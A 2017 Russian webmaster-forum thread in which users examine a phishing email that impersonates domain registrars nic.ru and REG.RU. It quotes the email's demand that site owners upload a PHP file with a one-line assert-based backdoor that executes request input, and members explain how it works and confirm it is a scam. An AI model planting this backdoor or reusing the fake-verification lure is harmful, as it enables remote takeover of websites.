Перейти к содержимому

MOAB

- - - - -

Письмо от nic.ru - развод или нет?


  • Войдите, чтобы ответить
Сообщений в теме: 12

#1 protector

protector

    Почетный

  • Основатель
  • PipPipPipPipPip
  • 2 503 сообщений
1 147
  • ИзСанкт-Петербурга

Отправлено 15 Февраль 2017 - 18:17

Пришло на почту письмо

Цитата

Уважаемый клиент!

В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменом ***.ru осуществляется лицом, указанным в качестве его администратора.

Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл a18j1z0pmhg57nhu.php со следующим содержимым:

<?php
assert(stripslashes($_REQUEST[RUCENTER]));
?>


Файл должен быть создан в течение трех календарных дней с момента получения настоящего письма и находиться на сервере до 28 февраля 2017 года, 20:00 (UTC+03:00), в противном случае процедура подтверждения не будет пройдена.

Обращаем Ваше внимание на то, что если процедура подтверждения не будет пройдена, делегирование домена будет приостановлено.
Очень похоже на развод, но с другой стороны assert возвращает true или false.
) Или таким образом сделают много mysql запросов и что-нибудь найдут?

Это развод, так ведь?

#2 uniks

uniks

    Почетный

  • Основатель
  • PipPipPipPipPip
  • 3 074 сообщений
2 912
  • ИзИркутск

Отправлено 15 Февраль 2017 - 18:34

А что поддержка nic.ru говорит?

#3 Duf

Duf

    Мастер

  • Основатель
  • PipPipPipPip
  • 703 сообщений
875
  • ИзМосквы

Отправлено 15 Февраль 2017 - 18:36

Не могу найти, наверно снес, как спам, опровержение потом через день пришло оттуда же )), у меня с рег ру типа было


ps нашел и первое и второе (в один день пришли даже):

Уважаемый клиент!

В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменом s******.ru осуществляется лицом, указанным в качестве его администратора.

Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл a17r17d23x6ox6gd.php со следующим содержимым:

<?php
assert(stripslashes($_REQUEST[REGRU]));
?>


Файл должен быть создан в течение трех календарных дней с момента получения настоящего письма и находиться на сервере до 3 февраля 2017 года, 20:00 (UTC+03:00), в противном случае процедура подтверждения не будет пройдена.

Обращаем Ваше внимание на то, что если процедура подтверждения не будет пройдена, делегирование домена будет приостановлено.

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Внимание! Зафиксирована попытка мошенничества
Уважаемые клиенты! Зафиксирована попытка мошенничества в отношении пользователей сервисов REG.RU. На электронную почту некоторых клиентов компании мошенниками было отправлено письмо c требованием разместить в корневой директории сайта вредоносный файл для подтверждения прав на доменное имя.

Обращаем ваше внимание, что компания REG.RU не отправляла данные письма, а также никогда не запрашивает подтверждение прав на домен подобным образом и не требует размещения файлов на хостинге.

Мошенники при помощи массовых рассылок электронных писем от имени известных компаний преследуют цель получения доступа к конфиденциальным данным пользователей или распространения вредоносных программ. Поэтому при получении такого письма настоятельно рекомендуем проигнорировать его. В случае возникновения любых подозрений обратитесь в нашу службу технической поддержки.

Сообщение отредактировал Duf: 15 Февраль 2017 - 18:50


#4 donc

donc

    Гай Юлий Калигула Сковородкер

  • Основатель
  • PipPipPipPipPip
  • 9 057 сообщений
7 326
  • Изсекты свидетелей Кецалькоатля

Отправлено 15 Февраль 2017 - 19:03

?php
Да после этого сразу в корзину, какой там пхп, зачем

#5 madcap

madcap

    Мастер

  • Старая гвардия
  • PipPipPipPip
  • 719 сообщений
609
  • ИзМосквы

Отправлено 15 Февраль 2017 - 19:12

Очевидный развод.
Бывают же проекты без php.
например, с использованием перл.
Ну или голый html..

#6 donc

donc

    Гай Юлий Калигула Сковородкер

  • Основатель
  • PipPipPipPipPip
  • 9 057 сообщений
7 326
  • Изсекты свидетелей Кецалькоатля

Отправлено 15 Февраль 2017 - 19:20

madcap, а бывают вообще домены без хостинга, про запас или на продажу

#7 protector

protector

    Почетный

  • Основатель
  • PipPipPipPipPip
  • 2 503 сообщений
1 147
  • ИзСанкт-Петербурга

TC Отправлено 15 Февраль 2017 - 19:48

ясно)

#8 GogA

GogA

    Продвинутый

  • Основатель
  • PipPipPip
  • 265 сообщений
237
  • ИзMoscow

Отправлено 16 Февраль 2017 - 02:22

Просмотр сообщенияprotector (15 Февраль 2017 - 18:17) писал:

Очень похоже на развод, но с другой стороны assert возвращает true или false.

<?php
assert(stripslashes($_REQUEST[RUCENTER]));
?>

Да какая разница что возвращает код. Он уже исполнится на сервере. Например, через проверку $_REQUEST[RUCENTER] рядом с проверяемым файлом загружается php shell, true — успешно загрузился, а false — что-то ещё подправить :) Притом результат даже в браузер не будет выведен.

Короче, 100% развод, аналогичные псевдо-проверки спамят и по другим регистраторам.

#9 KaSH

KaSH

    Инструктор по счастью

  • Основатель
  • PipPipPipPip
  • 1 264 сообщений
2 059
  • Изморя и с гор

Отправлено 16 Февраль 2017 - 15:31

Просмотр сообщенияprotector (15 Февраль 2017 - 18:17) писал:

Пришло на почту письмо
...
Это развод, так ведь?
Развод, конечно :)
Ну какой сервис будет просить воткнуть php код, да еще такой.
asset, кстати, не возвращает true или false, а позволяет выполнить кусок кода - http://php.net/assert

Цитата

Если assertion задано как строка, оно будет вычислено функцией assert() как РНР-код.

А для того, чтобы наверняка - еще и слеши удаляются.

Но, если есть большое желание разобрать все по костям, можно воткнуть в этот файл код, который получит $_REQUEST[RUCENTER] , и запишет его содержимое, например, в текстовый файл. И полюбоваться, что туда начнут пихать.
Есть вещи получше качалки, сноуборда, виндсерфинга, кайтсерфинга, роликов, батута, танцев... Но я о них никогда не слышал Изображение
Серьезные сайты размещаю на VPS, простые в TimeWeb. Старые, более ненужные мне сайты я продаю на Телдери. Бухгалтерию и отчеты в налоговую за меня делает Эльба.

#10 donc

donc

    Гай Юлий Калигула Сковородкер

  • Основатель
  • PipPipPipPipPip
  • 9 057 сообщений
7 326
  • Изсекты свидетелей Кецалькоатля

Отправлено 28 Март 2017 - 14:01

Руцентр проснулся. Не прошло и года:

Изображение

#11 angr

angr

    Мастер

  • S.E.Syndicate
  • PipPipPipPip
  • 504 сообщений
880

Отправлено 28 Март 2017 - 14:20

<p>

Просмотр сообщенияdonc сказал:

<br />Руцентр проснулся. Не прошло и года:<br />
<br /></p>
я давно уже видел это письмо...

#12 donc

donc

    Гай Юлий Калигула Сковородкер

  • Основатель
  • PipPipPipPipPip
  • 9 057 сообщений
7 326
  • Изсекты свидетелей Кецалькоатля

Отправлено 28 Март 2017 - 14:59

angr, мне только сегодня пришло))) Видимо я у них не перспективный клиент))

#13 Valek

Valek

    ВСтатусе

  • Активный участник
  • PipPipPipPip
  • 1 244 сообщений
1 856
  • ИзРоссии :(

Отправлено 28 Март 2017 - 21:12

Просмотр сообщенияdonc сказал:

мне только сегодня пришло
мне прислали вчера. Точнее уже позавчера
Самый удобный и правильный Онлайн-консультант P3chat
Отличный хостинг низкие цены, высокое качество и SSL Ссылка на сайт



Похожие темы


Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных



© 2017 SMO&SEO форум «WEBIMHO» — продвижение и создание сайтов, интернет-маркетинг

По вопросам рекламы на форуме и цены на рекламу
Все материалы SEO форума разрешены к копированию только с установкой гиперактивной ссылки на webimho.ru,
тем, кто этого не сделает, мы оторвем руки и ноги и поменяем местами,
а когда выйдем из тюрьмы, опять оторвем и опять поменяем.


Россия, г. Москва

Мы в соцсетях: twitter | вконтакте | facebook | livejournal